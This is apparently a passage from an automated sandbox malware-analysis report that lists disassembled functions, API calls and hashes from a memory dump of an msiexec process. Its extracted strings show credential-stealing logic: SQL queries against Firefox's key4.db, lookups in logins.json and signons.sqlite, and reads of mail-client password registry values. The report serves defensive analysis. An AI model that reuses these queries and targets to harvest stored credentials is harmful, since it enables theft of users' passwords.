                                                                                                                                                      • Instruction Fuzzy Hash: 8CC04C355107018BE7219B12C949763B7E4BB00316F54C81894A695454D77CE494CE18
                                                                                                                                                      APIs
                                                                                                                                                      • FindClose.KERNELBASE(?,00407EAA,?,?,00000000,ACD,0044424D,*.oeaccount,ACD,?,00000104), ref: 00407F9A
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000F.00000002.2422939736.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: CloseFind
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 1863332320-0
                                                                                                                                                      • Opcode ID: 57b8da30fad5a7bddd67670d8939520a2ad49927f904eaf4d9e0c7dde32a44f9
                                                                                                                                                      • Instruction ID: 6a16c08ea37d16c8a4aa15d9076e95747955e6fceefd1cb8b530e80fb020b3ed
                                                                                                                                                      • Opcode Fuzzy Hash: 57b8da30fad5a7bddd67670d8939520a2ad49927f904eaf4d9e0c7dde32a44f9
                                                                                                                                                      • Instruction Fuzzy Hash: 6DC092746165029FD22C5F38ECA942A77A1AF4A7303B80F6CE0F3D20F0E73898528A04
                                                                                                                                                      APIs
                                                                                                                                                      • GetFileAttributesA.KERNELBASE(?,00401EE6,?), ref: 00406F85
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000F.00000002.2422939736.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: AttributesFile
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 3188754299-0
                                                                                                                                                      • Opcode ID: fa0a746f1e19b68873f4d8ea5d8c23283e8dccdc4d936350afbdeaa92e1ec6ad
                                                                                                                                                      • Instruction ID: 9c49554ec541f0f53bfa1b31c7f3910b3cb34ca890cc3578c2bd02f8d22bfc28
                                                                                                                                                      • Opcode Fuzzy Hash: fa0a746f1e19b68873f4d8ea5d8c23283e8dccdc4d936350afbdeaa92e1ec6ad
                                                                                                                                                      • Instruction Fuzzy Hash: 0CB012B92110004BCB0807349C8904D36505F456317240B3CB033C01F0D720CCA0BE00
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000F.00000002.2422939736.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: PrivateProfileString_mbscmpstrlen
                                                                                                                                                      • String ID: ESMTPPassword$ESMTPUsername$POP3Password$POP3Server$POP3Username$SMTPServer
                                                                                                                                                      • API String ID: 3963849919-1658304561
                                                                                                                                                      • Opcode ID: abaa3120f3dadaa33e6fded1ed61a921173bd62cd5413d2d65547edf030f73d6
                                                                                                                                                      • Instruction ID: 768c2722c01e59d080de5de3380f4e9b1c28328498c4b4a1784570bb69a0741a
                                                                                                                                                      • Opcode Fuzzy Hash: abaa3120f3dadaa33e6fded1ed61a921173bd62cd5413d2d65547edf030f73d6
                                                                                                                                                      • Instruction Fuzzy Hash: B2213371D0111C6ADB61EB51DC82FEE7B7C9B44705F0400EBBA08B2082DBBC6F898E59
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000F.00000002.2422939736.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: ??2@??3@memcpymemset
                                                                                                                                                      • String ID: (yE$(yE$(yE
                                                                                                                                                      • API String ID: 1865533344-362086290
                                                                                                                                                      • Opcode ID: 0ccdd0ead4f7f762e657c049d916cce9c2c11d769d9b83e6b2670f1f2acaaac1
                                                                                                                                                      • Instruction ID: 81f979815271b6a149e92529059c9b1765a635985cdb271dadbae3a2bc10ddb4
                                                                                                                                                      • Opcode Fuzzy Hash: 0ccdd0ead4f7f762e657c049d916cce9c2c11d769d9b83e6b2670f1f2acaaac1
                                                                                                                                                      • Instruction Fuzzy Hash: 2D117975900209EFDF119F94C804AAE3BB1FF08326F10806AFD556B2A1C7798915EF69
                                                                                                                                                      APIs
                                                                                                                                                        • Part of subcall function 00406B6D: memset.MSVCRT ref: 00406B8E
                                                                                                                                                        • Part of subcall function 00406B6D: strlen.MSVCRT ref: 00406B99
                                                                                                                                                        • Part of subcall function 00406B6D: strlen.MSVCRT ref: 00406BA7
                                                                                                                                                        • Part of subcall function 00408934: GetFileSize.KERNEL32(00000000,00000000,?,00000000,?,0040F28D,?,00000000,?,?,?,?,?,?), ref: 00408952
                                                                                                                                                        • Part of subcall function 00408934: CloseHandle.KERNEL32(?,?), ref: 0040899C
                                                                                                                                                        • Part of subcall function 004089F2: _mbsicmp.MSVCRT ref: 00408A2C
                                                                                                                                                      • memset.MSVCRT ref: 0040E5B8
                                                                                                                                                      • memset.MSVCRT ref: 0040E5CD
                                                                                                                                                      • _mbscpy.MSVCRT(?,?,httpRealm,passwordField,usernameField,encryptedPassword,encryptedUsername,hostname,?,?,?,?,?,0040F28D), ref: 0040E634
                                                                                                                                                      • _mbscpy.MSVCRT(?,?,httpRealm,passwordField,usernameField,encryptedPassword,encryptedUsername,hostname,?,?,?,?,?,0040F28D), ref: 0040E64A
                                                                                                                                                      • _mbscpy.MSVCRT(?,00000000,httpRealm,passwordField,usernameField,encryptedPassword,encryptedUsername,hostname,?,?,?,?,?,0040F28D), ref: 0040E660
                                                                                                                                                      • _mbscpy.MSVCRT(?,00000000,httpRealm,passwordField,usernameField,encryptedPassword,encryptedUsername,hostname,?,?,?,?,?,0040F28D), ref: 0040E676
                                                                                                                                                      • _mbscpy.MSVCRT(?,00000000,httpRealm,passwordField,usernameField,encryptedPassword,encryptedUsername,hostname,?,?,?,?,?,0040F28D), ref: 0040E68C
                                                                                                                                                      • _mbscpy.MSVCRT(?,00000000,httpRealm,passwordField,usernameField,encryptedPassword,encryptedUsername,hostname,?,?,?,?,?,0040F28D), ref: 0040E69F
                                                                                                                                                      • memset.MSVCRT ref: 0040E6B5
                                                                                                                                                      • memset.MSVCRT ref: 0040E6CC
                                                                                                                                                        • Part of subcall function 004066A3: memset.MSVCRT ref: 004066C4
                                                                                                                                                        • Part of subcall function 004066A3: memcmp.MSVCRT(?,00456EA0,00000010,?,?,000000FF), ref: 004066EE
                                                                                                                                                      • memset.MSVCRT ref: 0040E736
                                                                                                                                                      • memset.MSVCRT ref: 0040E74F
                                                                                                                                                      • sprintf.MSVCRT ref: 0040E76D
                                                                                                                                                      • sprintf.MSVCRT ref: 0040E788
                                                                                                                                                      • _strcmpi.MSVCRT ref: 0040E79E
                                                                                                                                                      • _strcmpi.MSVCRT ref: 0040E7B7
                                                                                                                                                      • _strcmpi.MSVCRT ref: 0040E7D3
                                                                                                                                                      • memset.MSVCRT ref: 0040E858
                                                                                                                                                      • sprintf.MSVCRT ref: 0040E873
                                                                                                                                                      • _strcmpi.MSVCRT ref: 0040E889
                                                                                                                                                      • _strcmpi.MSVCRT ref: 0040E8A5
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000F.00000002.2422939736.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: memset$_mbscpy$_strcmpi$sprintf$strlen$CloseFileHandleSize_mbsicmpmemcmp
                                                                                                                                                      • String ID: encryptedPassword$encryptedUsername$hostname$httpRealm$imap://%s$logins$mailbox://%s$passwordField$smtp://%s$usernameField
                                                                                                                                                      • API String ID: 4171719235-3943159138
                                                                                                                                                      • Opcode ID: bf0017e867bbd9971ab7950a12d93933283a76136da63b011136ffef7bc63502
                                                                                                                                                      • Instruction ID: e6e1aca5762f927b6bef3ecf047b01a22afe4fa283f9592a273acc07610826c1
                                                                                                                                                      • Opcode Fuzzy Hash: bf0017e867bbd9971ab7950a12d93933283a76136da63b011136ffef7bc63502
                                                                                                                                                      • Instruction Fuzzy Hash: D6B152B2D04119AADF10EBA1DC41BDEB7B8EF04318F1444BBF548B7181EB39AA558F58
                                                                                                                                                      APIs
                                                                                                                                                      • GetDlgItem.USER32(?,000003E9), ref: 0041042E
                                                                                                                                                      • GetDlgItem.USER32(?,000003E8), ref: 0041043A
                                                                                                                                                      • GetWindowLongA.USER32(00000000,000000F0), ref: 00410449
                                                                                                                                                      • GetWindowLongA.USER32(?,000000F0), ref: 00410455
                                                                                                                                                      • GetWindowLongA.USER32(00000000,000000EC), ref: 0041045E
                                                                                                                                                      • GetWindowLongA.USER32(?,000000EC), ref: 0041046A
                                                                                                                                                      • GetWindowRect.USER32(00000000,?), ref: 0041047C
                                                                                                                                                      • GetWindowRect.USER32(?,?), ref: 00410487
                                                                                                                                                      • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 0041049B
                                                                                                                                                      • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 004104A9
                                                                                                                                                      • GetDC.USER32 ref: 004104E2
                                                                                                                                                      • strlen.MSVCRT ref: 00410522
                                                                                                                                                      • GetTextExtentPoint32A.GDI32(?,00000000,00000000,?), ref: 00410533
                                                                                                                                                      • ReleaseDC.USER32(?,?), ref: 00410580
                                                                                                                                                      • sprintf.MSVCRT ref: 00410640
                                                                                                                                                      • SetWindowTextA.USER32(?,?), ref: 00410654
                                                                                                                                                      • SetWindowTextA.USER32(?,00000000), ref: 00410672
                                                                                                                                                      • GetDlgItem.USER32(?,00000001), ref: 004106A8
                                                                                                                                                      • GetWindowRect.USER32(00000000,?), ref: 004106B8
                                                                                                                                                      • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 004106C6
                                                                                                                                                      • GetClientRect.USER32(?,?), ref: 004106DD
                                                                                                                                                      • GetWindowRect.USER32(?,?), ref: 004106E7
                                                                                                                                                      • SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,00000206), ref: 0041072D
                                                                                                                                                      • GetClientRect.USER32(?,?), ref: 00410737
                                                                                                                                                      • SetWindowPos.USER32(?,00000000,?,?,?,?,00000204), ref: 0041076F
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000F.00000002.2422939736.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: Window$Rect$Long$ItemPointsText$Client$ExtentPoint32Releasesprintfstrlen
                                                                                                                                                      • String ID: %s:$EDIT$STATIC
                                                                                                                                                      • API String ID: 1703216249-3046471546
                                                                                                                                                      • Opcode ID: 128263c36ef5345d2fa2b7d273f179e903fb80143bcb01b5421768440fe41b9e
                                                                                                                                                      • Instruction ID: 9785898008ba7037e97d6a181d6b2a38f1c87ee61eba0ca9b836c22844d1efbd
                                                                                                                                                      • Opcode Fuzzy Hash: 128263c36ef5345d2fa2b7d273f179e903fb80143bcb01b5421768440fe41b9e
                                                                                                                                                      • Instruction Fuzzy Hash: 36B1DF75508341AFD750DFA8C985E6BBBE9FF88704F00492DF59982261DB75E804CF16
                                                                                                                                                      APIs
                                                                                                                                                      • memset.MSVCRT ref: 004024F5
                                                                                                                                                        • Part of subcall function 00410ADD: RegQueryValueExA.ADVAPI32(?,?,00000000,?,00401C6A,?,?,?,?,00401C6A,?,?,?), ref: 00410AF8
                                                                                                                                                      • _mbscpy.MSVCRT(?,00000000,?,?,?,67CB7B60,?,00000000), ref: 00402533
                                                                                                                                                      • _mbscpy.MSVCRT(?,?), ref: 004025FD
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000F.00000002.2422939736.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: _mbscpy$QueryValuememset
                                                                                                                                                      • String ID: HTTPMail$HTTPMail Port$HTTPMail Secure Connection$HTTPMail Server$HTTPMail User Name$IMAP$IMAP Port$IMAP Secure Connection$IMAP Server$IMAP User Name$POP3$POP3 Port$POP3 Secure Connection$POP3 Server$POP3 User Name$Password2$SMTP$SMTP Display Name$SMTP Email Address$SMTP Port$SMTP Secure Connection$SMTP Server$SMTP USer Name
                                                                                                                                                      • API String ID: 168965057-606283353
                                                                                                                                                      • Opcode ID: db52dd6227f64e1606ed286d3875c760bf9a06f6856d1fddeb2df187246517b6
                                                                                                                                                      • Instruction ID: 7e64c7f7efb5926a908898138c7c80272d7c47f2ed846a803f17f87345e13469
                                                                                                                                                      • Opcode Fuzzy Hash: db52dd6227f64e1606ed286d3875c760bf9a06f6856d1fddeb2df187246517b6
                                                                                                                                                      • Instruction Fuzzy Hash: 0A5173B640221DABEF60DF91CC85ADD7BA8EF04318F54846BF908A7141D7BD9588CF98
                                                                                                                                                      APIs
                                                                                                                                                      • GetDlgItem.USER32(?,000003EC), ref: 004010BC
                                                                                                                                                      • ChildWindowFromPoint.USER32(?,?,?), ref: 004010CE
                                                                                                                                                      • GetDlgItem.USER32(?,000003EE), ref: 00401103
                                                                                                                                                      • ChildWindowFromPoint.USER32(?,?,?), ref: 00401110
                                                                                                                                                      • GetDlgItem.USER32(?,000003EC), ref: 0040113E
                                                                                                                                                      • ChildWindowFromPoint.USER32(?,?,?), ref: 00401150
                                                                                                                                                      • LoadCursorA.USER32(00000067), ref: 0040115F
                                                                                                                                                      • SetCursor.USER32(00000000,?,?), ref: 00401166
                                                                                                                                                      • GetDlgItem.USER32(?,000003EE), ref: 00401186
                                                                                                                                                      • ChildWindowFromPoint.USER32(?,?,?), ref: 00401193
                                                                                                                                                      • GetDlgItem.USER32(?,000003EC), ref: 004011AD
                                                                                                                                                      • SetBkMode.GDI32(?,00000001), ref: 004011B9
                                                                                                                                                      • SetTextColor.GDI32(?,00C00000), ref: 004011C7
                                                                                                                                                      • GetSysColorBrush.USER32(0000000F), ref: 004011CF
                                                                                                                                                      • GetDlgItem.USER32(?,000003EE), ref: 004011EF
                                                                                                                                                      • EndDialog.USER32(?,00000001), ref: 0040121A
                                                                                                                                                      • DeleteObject.GDI32(?), ref: 00401226
                                                                                                                                                      • GetDlgItem.USER32(?,000003ED), ref: 0040124A
                                                                                                                                                      • ShowWindow.USER32(00000000), ref: 00401253
                                                                                                                                                      • GetDlgItem.USER32(?,000003EE), ref: 0040125F
                                                                                                                                                      • ShowWindow.USER32(00000000), ref: 00401262
                                                                                                                                                      • SetDlgItemTextA.USER32(?,000003EE,0045A5E0), ref: 00401273
                                                                                                                                                      • memset.MSVCRT ref: 0040128E
                                                                                                                                                      • SetWindowTextA.USER32(?,00000000), ref: 004012AA
                                                                                                                                                      • SetDlgItemTextA.USER32(?,000003EA,?), ref: 004012C2
                                                                                                                                                      • SetDlgItemTextA.USER32(?,000003EC,?), ref: 004012D3
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000F.00000002.2422939736.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: Item$Window$Text$ChildFromPoint$ColorCursorShow$BrushDeleteDialogLoadModeObjectmemset
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 2998058495-0
                                                                                                                                                      • Opcode ID: 6a1a0106eeb2062a51b7786bb007bda916ff9620d132a9d16e41ded145a17969
                                                                                                                                                      • Instruction ID: d99c78195822e95bfb56004c40aa855916ae81609c5fc0371f4bc40fa141afdc
                                                                                                                                                      • Opcode Fuzzy Hash: 6a1a0106eeb2062a51b7786bb007bda916ff9620d132a9d16e41ded145a17969
                                                                                                                                                      • Instruction Fuzzy Hash: 2661AA35800248EBDF12AFA0DD85BAE7FA5BB05304F1881B6F904BA2F1C7B59D50DB58
                                                                                                                                                      APIs
                                                                                                                                                      • memcmp.MSVCRT(?,file:,00000005,00000000,00000000,BINARY,?,?,?,?,00442B47,00000000), ref: 004425C8
                                                                                                                                                      • memcmp.MSVCRT(localhost,?,00000009,00000000,00000000,BINARY,?,?,?,?,00442B47,00000000), ref: 00442656
                                                                                                                                                      • memcmp.MSVCRT(vfs,00000001,00000000,00000000,00000000,BINARY,?,?,?,?,00442B47,00000000), ref: 00442800
                                                                                                                                                      • memcmp.MSVCRT(cache,00000001,00000005,00000000,00000000,BINARY), ref: 0044282C
                                                                                                                                                      • memcmp.MSVCRT(mode,00000001,00000004,00000000,00000000,BINARY), ref: 0044285E
                                                                                                                                                      • memcmp.MSVCRT(?,?,G+D,00000000,00000000,BINARY), ref: 004428A9
                                                                                                                                                      • memcpy.MSVCRT(00000000,?,00000000,00000000,00000000,BINARY,?,?,?,?,00442B47,00000000), ref: 0044293C
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000F.00000002.2422939736.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: memcmp$memcpy
                                                                                                                                                      • String ID: %s mode not allowed: %s$,nE$@$BINARY$G+D$G+D$access$cache$file:$invalid uri authority: %.*s$localhost$mode$no such %s mode: %s$no such vfs: %s$vfs
                                                                                                                                                      • API String ID: 231171946-2189169393
                                                                                                                                                      • Opcode ID: 1a21d1ba4c7cba85a31c946e058b01c84a8823fb64876f3ea2b96bfae0f1469d
                                                                                                                                                      • Instruction ID: 1e7ca99fc42d5c672073ce6a9752caade8d3c68442cd6653d693641e17a54130
                                                                                                                                                      • Opcode Fuzzy Hash: 1a21d1ba4c7cba85a31c946e058b01c84a8823fb64876f3ea2b96bfae0f1469d
                                                                                                                                                      • Instruction Fuzzy Hash: 30D13671904245ABFF248F68CA407EEBBB1AF15305F54406FF844A7341D3F89A86CB99
                                                                                                                                                      APIs
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000F.00000002.2422939736.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: _mbscat$memsetsprintf$_mbscpy
                                                                                                                                                      • String ID: color="#%s"$ size="%d"$</b>$</font>$<b>$<font
                                                                                                                                                      • API String ID: 633282248-1996832678
                                                                                                                                                      • Opcode ID: 0c13a19f140ebb8c22a2bc6978d10b948314cef2adf7705f28c84de1f2e61c89
                                                                                                                                                      • Instruction ID: de3fd18750e25ac655c57e1f527e3f4ad82db586d7f8767584d5c6c21a88759b
                                                                                                                                                      • Opcode Fuzzy Hash: 0c13a19f140ebb8c22a2bc6978d10b948314cef2adf7705f28c84de1f2e61c89
                                                                                                                                                      • Instruction Fuzzy Hash: 0C31A9B28056557AFB20EB559C42FDAB3ACDF14315F10419FF21462182EA7CAEC4865D
                                                                                                                                                      APIs
                                                                                                                                                      • memset.MSVCRT ref: 00406782
                                                                                                                                                        • Part of subcall function 00406F06: strlen.MSVCRT ref: 00406F0B
                                                                                                                                                        • Part of subcall function 00406F06: memcpy.MSVCRT(?,00401CA1,00000000,00000000,00401CA1,00000001), ref: 00406F20
                                                                                                                                                      • memcpy.MSVCRT(?,00000000,00000000,?,?,?,?,?,key4.db,00000143,00000000), ref: 0040685E
                                                                                                                                                      • memcmp.MSVCRT(00000000,00457934,00000006,?,?,?,?,?,?,?,?,key4.db,00000143,00000000), ref: 0040686E
                                                                                                                                                      • memcpy.MSVCRT(?,00000023,?,?,?,?,?,?,?,?,?,?,?,?,key4.db,00000143), ref: 004068A1
                                                                                                                                                      • memcpy.MSVCRT(?,?,00000010), ref: 004068BA
                                                                                                                                                      • memcpy.MSVCRT(?,?,00000010), ref: 004068D3
                                                                                                                                                      • memcmp.MSVCRT(00000000,0045793C,00000006,?,?,?,?,?,?,?,?,?,?,?,key4.db,00000143), ref: 004068EC
                                                                                                                                                      • memcpy.MSVCRT(?,00000015,?), ref: 00406908
                                                                                                                                                      • memcmp.MSVCRT(00000000,00456EA0,00000010,?,?,?,?,?,?,?,?,?,?,key4.db,00000143,00000000), ref: 004069B2
                                                                                                                                                      • memcmp.MSVCRT(00000000,00457944,00000006), ref: 004069CA
                                                                                                                                                      • memcpy.MSVCRT(?,00000023,?), ref: 00406A03
                                                                                                                                                      • memcpy.MSVCRT(?,00000042,00000010), ref: 00406A1F
                                                                                                                                                      • memcpy.MSVCRT(?,00000054,00000020), ref: 00406A3B
                                                                                                                                                      • memcmp.MSVCRT(00000000,0045794C,00000006), ref: 00406A4A
                                                                                                                                                      • memcpy.MSVCRT(?,00000015,?), ref: 00406A6E
                                                                                                                                                      • memcpy.MSVCRT(?,0000001A,00000020), ref: 00406A86
                                                                                                                                                      Strings
                                                                                                                                                      • key4.db, xrefs: 00406756
                                                                                                                                                      • , xrefs: 00406834
                                                                                                                                                      • SELECT item1,item2 FROM metadata WHERE id = 'password', xrefs: 004067C4
                                                                                                                                                      • SELECT a11,a102 FROM nssPrivate, xrefs: 00406933
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000F.00000002.2422939736.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: memcpy$memcmp$memsetstrlen
                                                                                                                                                      • String ID: $SELECT a11,a102 FROM nssPrivate$SELECT item1,item2 FROM metadata WHERE id = 'password'$key4.db
                                                                                                                                                      • API String ID: 3614188050-3983245814
                                                                                                                                                      • Opcode ID: 36044ac86a6ba26f1195c251ddbd5a0cf0b65534d70e88717d104d14f24e386f
                                                                                                                                                      • Instruction ID: f64da88478914857a13bd548ab7de8656dcb141f17a11f318e4dfa38f1e39988
                                                                                                                                                      • Opcode Fuzzy Hash: 36044ac86a6ba26f1195c251ddbd5a0cf0b65534d70e88717d104d14f24e386f
                                                                                                                                                      • Instruction Fuzzy Hash: 76A1C7B1A00215ABDB14EFA5D841BDFB3A8FF44308F11453BF515E7282E778EA548B98
                                                                                                                                                      APIs
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000F.00000002.2422939736.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: sprintf$memset$_mbscpy
                                                                                                                                                      • String ID: bgcolor="%s"$ width="%s"$</font>$<font color="%s">$<table border="1" cellpadding="5"><tr%s>$<th%s>%s%s%s
                                                                                                                                                      • API String ID: 3402215030-3842416460
                                                                                                                                                      • Opcode ID: a1375856f58305cbc92444a301f89f903b2e6d760937f4398232927644d79174
                                                                                                                                                      • Instruction ID: f20d4583fe87a1bfbd8f178ed5e4bb51106c12545e3cf4f5d6ab8081ed6cb500
                                                                                                                                                      • Opcode Fuzzy Hash: a1375856f58305cbc92444a301f89f903b2e6d760937f4398232927644d79174
                                                                                                                                                      • Instruction Fuzzy Hash: 2E4152B2C0115D6AEB21EB54DC42FEA776CEF54308F0401E7B619E2152E278AB988B65
                                                                                                                                                      APIs
                                                                                                                                                        • Part of subcall function 00407B29: GetFileSize.KERNEL32(00000000,00000000,?,?,?,0040F0E7,?,?,?,?), ref: 00407B42
                                                                                                                                                        • Part of subcall function 00407B29: CloseHandle.KERNEL32(00000000,?,?,?), ref: 00407B6E
                                                                                                                                                        • Part of subcall function 004080D4: free.MSVCRT ref: 004080DB
                                                                                                                                                        • Part of subcall function 00407035: _mbscpy.MSVCRT(?,?,0040F113,?,?,?,?,?), ref: 0040703A
                                                                                                                                                        • Part of subcall function 00407035: strrchr.MSVCRT ref: 00407042
                                                                                                                                                        • Part of subcall function 0040DAC2: memset.MSVCRT ref: 0040DAE3
                                                                                                                                                        • Part of subcall function 0040DAC2: memset.MSVCRT ref: 0040DAF7
                                                                                                                                                        • Part of subcall function 0040DAC2: memset.MSVCRT ref: 0040DB0B
                                                                                                                                                        • Part of subcall function 0040DAC2: memcpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040DBD8
                                                                                                                                                        • Part of subcall function 0040DAC2: memcpy.MSVCRT(?,?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040DC38
                                                                                                                                                        • Part of subcall function 0040F036: _mbsicmp.MSVCRT ref: 0040F07F
                                                                                                                                                      • strlen.MSVCRT ref: 0040F139
                                                                                                                                                      • strlen.MSVCRT ref: 0040F147
                                                                                                                                                      • memset.MSVCRT ref: 0040F187
                                                                                                                                                      • strlen.MSVCRT ref: 0040F196
                                                                                                                                                      • strlen.MSVCRT ref: 0040F1A4
                                                                                                                                                      • memset.MSVCRT ref: 0040F1EA
                                                                                                                                                      • strlen.MSVCRT ref: 0040F1F9
                                                                                                                                                      • strlen.MSVCRT ref: 0040F207
                                                                                                                                                      • _strcmpi.MSVCRT ref: 0040F2B2
                                                                                                                                                      • _mbscpy.MSVCRT(00000004,00000204,?,?,?,?,?,?), ref: 0040F2CD
                                                                                                                                                      • _mbscpy.MSVCRT(00000004,00000204,?,?,?,?,?,?), ref: 0040F30E
                                                                                                                                                        • Part of subcall function 004070E3: _mbscpy.MSVCRT(00000000,00000000,sqlite3.dll,00402116,00000000,nss3.dll), ref: 004070EB
                                                                                                                                                        • Part of subcall function 004070E3: _mbscat.MSVCRT ref: 004070FA
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000F.00000002.2422939736.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: strlen$memset$_mbscpy$memcpy$CloseFileHandleSize_mbscat_mbsicmp_strcmpifreestrrchr
                                                                                                                                                      • String ID: logins.json$none$signons.sqlite$signons.txt
                                                                                                                                                      • API String ID: 2003275452-3138536805
                                                                                                                                                      • Opcode ID: ee10521dd79ee73122fc0f876785dd9113831bb39c60f606fe2404f3e43330c8
                                                                                                                                                      • Instruction ID: 4390ea688f3eb6ff8deec26b973fceccf030c6f24aada76a9830730871e88cce
                                                                                                                                                      • Opcode Fuzzy Hash: ee10521dd79ee73122fc0f876785dd9113831bb39c60f606fe2404f3e43330c8
                                                                                                                                                      • Instruction Fuzzy Hash: 5261F671504605AED724EB70CC81BDAB3E8AF14314F1405BFE599E30C1EB78BA89CB99
                                                                                                                                                      APIs
                                                                                                                                                      • memset.MSVCRT ref: 0040C3F7
                                                                                                                                                      • GetModuleFileNameA.KERNEL32(00000000,00000000,00000104,?,00000000,00000000), ref: 0040C408
                                                                                                                                                      • strrchr.MSVCRT ref: 0040C417
                                                                                                                                                      • _mbscat.MSVCRT ref: 0040C431
                                                                                                                                                      • _mbscpy.MSVCRT(?,00000000,00000000,.cfg), ref: 0040C465
                                                                                                                                                      • _mbscpy.MSVCRT(00000000,General,?,00000000,00000000,.cfg), ref: 0040C476
                                                                                                                                                      • GetWindowPlacement.USER32(?,?), ref: 0040C50C
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000F.00000002.2422939736.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: _mbscpy$FileModuleNamePlacementWindow_mbscatmemsetstrrchr
                                                                                                                                                      • String ID: .cfg$AddExportHeaderLine$General$MarkOddEvenRows$SaveFilterIndex$ShowGridLines$WinPos
                                                                                                                                                      • API String ID: 1012775001-1343505058
                                                                                                                                                      • Opcode ID: 67e53a8000507b2df1606981ac9655a9ff446d7e1ebb268b9dca7550b5d4ed50
                                                                                                                                                      • Instruction ID: 781a2e52d7f362fd39b5c74be6276a003a473a920a8a4abf0813dd90f66971c0
                                                                                                                                                      • Opcode Fuzzy Hash: 67e53a8000507b2df1606981ac9655a9ff446d7e1ebb268b9dca7550b5d4ed50
